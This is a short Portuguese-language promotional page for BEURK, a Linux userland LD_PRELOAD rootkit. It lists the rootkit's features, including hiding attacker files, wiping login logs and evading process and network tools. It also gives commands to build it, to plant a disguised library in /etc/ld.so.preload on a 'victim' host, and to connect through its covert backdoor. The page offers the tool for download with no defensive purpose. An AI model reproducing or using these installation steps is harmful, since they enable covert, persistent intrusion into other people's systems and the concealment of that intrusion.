BEURK – Rootkit de pré-carregamento de usuário do Linux
O BEURK é um rootkit de pré-carregamento do usuário para o GNU / Linux, fortemente focado em anti-depuração e anti-detecção.
Por ser um rootkit userland, ele concede privilégios limitados (o que o usuário tem basicamente) versus um superusuário ou rootkit no nível raiz.
Recursos
- Ocultar arquivos e diretórios do invasor
- Limpeza de log em tempo real (em utmp / wtmp)
- Anti processo e detecção de login
- Ignorar a análise unhide, lsof, ps, ldd, netstat
- Furtivo cliente backdoor PTY
Uso
Compilar
| 123 | git clone https://github.com/unix-thrust/beurk.git cd beurk make |
Instalar
| 12 | scp libselinux.so [email protected]:/lib/ ssh [email protected] ‘echo /lib/libselinux.so >> /etc/ld.so.preload’ |
Apreciar !
| 1 | ./client.py victim_ip:port # connect with furtive backdoor |
Dependências
Os seguintes pacotes não são necessários para construir o BEURK no momento:
- libpcap – para evitar sniffing local
- libpam – para backdoor local do PAM
- libssl – para conexão backdoor criptografada
Você pode fazer o download do BEURK aqui: